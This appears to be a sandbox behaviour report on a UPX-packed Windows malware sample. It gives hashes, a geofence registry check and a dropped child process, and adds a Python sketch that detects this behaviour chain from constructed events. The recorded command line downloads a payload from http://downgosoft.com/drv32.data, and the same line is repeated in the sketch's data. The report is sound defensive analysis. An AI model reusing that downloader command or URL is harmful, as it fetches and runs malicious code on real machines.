Analysis
max time kernel: 149s
max time network: 150s
platform: windows10-2004_x64
resource: win10v2004-20240226-en
resource tags: arch:x64, arch:x86, image:win10v2004-20240226-en, locale:en-us, os:windows10-2004-x64, system
submitted: 05/03/2024, 04:29
Behavioral tasks
behavioral1: sample b3c826c8e7de52b473258d54d67b528e.exe, resource win7-20240221-en
behavioral2: sample b3c826c8e7de52b473258d54d67b528e.exe, resource win10v2004-20240226-en
General
Target: b3c826c8e7de52b473258d54d67b528e.exe
Size: 83KB
MD5: b3c826c8e7de52b473258d54d67b528e
SHA1: dac2de8157e88c90257a255e8840fa661897e1a7
SHA256: 5ec3a4f34c759cc44406d8402bcb640667c80da262e6811ff95402e2b48a0458
SHA512: 0a99c1b7711877cad92fa538db9a09f5eb36ea5c28885eb6a841d21cc32e7681f4da1b6b91e0c201dc82479b0c8d99ed3516fc978a8ecf2d687ecc5c3bc3c4a3
SSDEEP: 1536:0VmNBnskjNwF4mchK5RF12Ma0gRke7jbXOwzWSP1HdPI88i2nJy+wZm:rN9NdmxP8RkCHBvPpmi2ncbs
Malware Config
Signatures
-
Checks computer location settings (2 TTPs, 1 IoC)
Looks up the country code configured in the registry, likely a geofence check.
Key value queried: \REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000\Control Panel\International\Geo\Nation
Process: b3c826c8e7de52b473258d54d67b528e.exe

Executes dropped EXE (1 IoC)
PID 2200, process A3A2B-tmp.eXe

Matches yara rule upx, i.e. UPX-packed (3 IoCs)
- behavioral2/files/0x0007000000023221-4.dat
- behavioral2/memory/2200-11-0x0000000000400000-0x0000000000424000-memory.dmp
- behavioral2/memory/2200-14-0x0000000000400000-0x0000000000424000-memory.dmp

Enumerates physical storage devices (1 TTP)
Attempts to interact with connected storage/optical drive(s).

Suspicious use of WriteProcessMemory (3 IoCs)
PID 3044 (b3c826c8e7de52b473258d54d67b528e.exe) wrote to the memory of PID 2200, procid_target 88; the same entry is recorded three times.
Processes
C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe (PID 3044)
  command line: "C:\Users\Admin\AppData\Local\Temp\b3c826c8e7de52b473258d54d67b528e.exe"
  - Checks computer location settings
  - Suspicious use of WriteProcessMemory
  child: C:\Users\Admin\AppData\Local\Temp\A3A2B-tmp.eXe (PID 2200)
    command line: "C:\Users\Admin\AppData\Local\Temp\A3A2B-tmp.eXe" http://downgosoft.com/drv32.data "C:\Users\Admin\AppData\Local\Temp\A3A2B-tmpa"
    - Executes dropped EXE
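A detection sketch for the behaviour chain recorded above, added here as an example and not part of the sandbox report: it runs three checks over constructed Sysmon-style events (a Geo\Nation registry read by a process running from %TEMP%, a %TEMP% binary launched with a URL argument followed by an output path, and a parent writing into the memory of a child it spawned) and flags any PID on which at least two of them fire. The event records, including explorer.exe as PID 4460 standing in for the sample's parent and acting as benign noise, are constructed from the report's process tree, not exported from the sandbox.

```python
import re
from typing import Dict, List, Tuple

# Constructed Sysmon-style events mirroring this report's process tree and
# signatures. Illustrative data, not telemetry from the run; PID 4460
# (explorer.exe as the sample's parent) is an assumption added as noise.
TEMP_DIR = r"C:\Users\Admin\AppData\Local\Temp"
SID_HIVE = r"\REGISTRY\USER\S-1-5-21-399997616-3400990511-967324271-1000"
GEO_KEY = SID_HIVE + r"\Control Panel\International\Geo\Nation"
EVENTS: List[Dict] = [
    {"type": "process_create", "pid": 4460, "ppid": 1000,
     "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"type": "registry_query", "pid": 4460, "key": GEO_KEY},  # benign read
    {"type": "process_create", "pid": 3044, "ppid": 4460,
     "image": TEMP_DIR + r"\b3c826c8e7de52b473258d54d67b528e.exe",
     "cmdline": '"' + TEMP_DIR + r'\b3c826c8e7de52b473258d54d67b528e.exe"'},
    {"type": "registry_query", "pid": 3044, "key": GEO_KEY},
    {"type": "process_create", "pid": 2200, "ppid": 3044,
     "image": TEMP_DIR + r"\A3A2B-tmp.eXe",
     "cmdline": '"' + TEMP_DIR + r'\A3A2B-tmp.eXe" http://downgosoft.com/drv32.data "'
                + TEMP_DIR + r'\A3A2B-tmpa"'},
    {"type": "process_access", "source_pid": 3044, "target_pid": 2200,
     "api": "WriteProcessMemory"},
]

TEMP_RE = re.compile(r"\\AppData\\Local\\Temp\\", re.IGNORECASE)
URL_RE = re.compile(r"^https?://", re.IGNORECASE)
WIN_PATH_RE = re.compile(r"^[A-Za-z]:\\")
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')
GEO_KEY_SUFFIX = r"\control panel\international\geo\nation"


def split_cmdline(cmdline: str) -> List[str]:
    """Split a Windows command line into arguments, honouring double quotes."""
    return [quoted or bare for quoted, bare in ARG_RE.findall(cmdline)]


def processes(events: List[Dict]) -> Dict[int, Dict]:
    """Index process_create events by PID."""
    return {e["pid"]: e for e in events if e["type"] == "process_create"}


def in_temp(path: str) -> bool:
    return bool(TEMP_RE.search(path))


def geofence_checks(events: List[Dict]) -> List[int]:
    """PIDs of %TEMP% processes that read Geo\\Nation. The read alone is weak
    evidence (Explorer reads it too), so location is required as well."""
    procs = processes(events)
    hits = []
    for e in events:
        if e["type"] == "registry_query" and e["key"].lower().endswith(GEO_KEY_SUFFIX):
            proc = procs.get(e["pid"])
            if proc and in_temp(proc["image"]):
                hits.append(e["pid"])
    return hits


def temp_downloaders(events: List[Dict]) -> List[Tuple[int, str, str]]:
    """(pid, url, output path) for %TEMP% binaries launched with a URL argument
    immediately followed by a local path: the A3A2B-tmp.eXe pattern above."""
    hits = []
    for proc in processes(events).values():
        if not in_temp(proc["image"]):
            continue
        args = split_cmdline(proc["cmdline"])[1:]  # drop argv[0]
        for i, arg in enumerate(args[:-1]):
            if URL_RE.match(arg) and WIN_PATH_RE.match(args[i + 1]):
                hits.append((proc["pid"], arg, args[i + 1]))
    return hits


def parent_writes_to_child(events: List[Dict]) -> List[Tuple[int, int]]:
    """(parent, child) pairs where a parent wrote into a child it spawned."""
    procs = processes(events)
    hits = []
    for e in events:
        if e["type"] == "process_access" and e["api"] == "WriteProcessMemory":
            child = procs.get(e["target_pid"])
            if child and child["ppid"] == e["source_pid"]:
                hits.append((e["source_pid"], e["target_pid"]))
    return hits


def triage(events: List[Dict]) -> Dict[str, object]:
    """Run all checks; flag PIDs on which at least two of them fire."""
    findings: Dict[str, object] = {
        "geofence": geofence_checks(events),
        "downloader": temp_downloaders(events),
        "memory_write": parent_writes_to_child(events),
    }
    score: Dict[int, int] = {}
    for pid in findings["geofence"]:
        score[pid] = score.get(pid, 0) + 1
    for pid, _url, _path in findings["downloader"]:
        score[pid] = score.get(pid, 0) + 1
    for parent, child in findings["memory_write"]:
        score[parent] = score.get(parent, 0) + 1
        score[child] = score.get(child, 0) + 1
    findings["flagged"] = sorted(pid for pid, s in score.items() if s >= 2)
    return findings


if __name__ == "__main__":
    for name, value in triage(EVENTS).items():
        print(f"{name}: {value}")
```

The Geo\Nation read is only scored for processes running from %TEMP% because Explorer and many legitimate applications read the same value. The memory-write check is likewise only used in combination: a parent writing into a child it has just created is also what CreateProcess itself does when it sets up the new process's parameters, so on its own it does not indicate injection. Adapt the paths and event field names to your own telemetry.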
Network
MITRE ATT&CK Enterprise v15
Downloads
Filesize: 36KB
MD5: a6ef8e1067dae3cf7537712443bf3b77
SHA1: 204b8a6402b415533540d0c2659c5722a21da8be
SHA256: 2917964e199063cb0cd0bced5d1f7846edcb810fe02fff8f0b1dd053746cf229
SHA512: 9662f18208b8a6c27a29e496b75d24ef9a910c20cd458fe8ea58458986253d3ff0a82e349cbfa804b52b3dd0913d995e737f740f48f1a16b8d2ff908ee9cc14a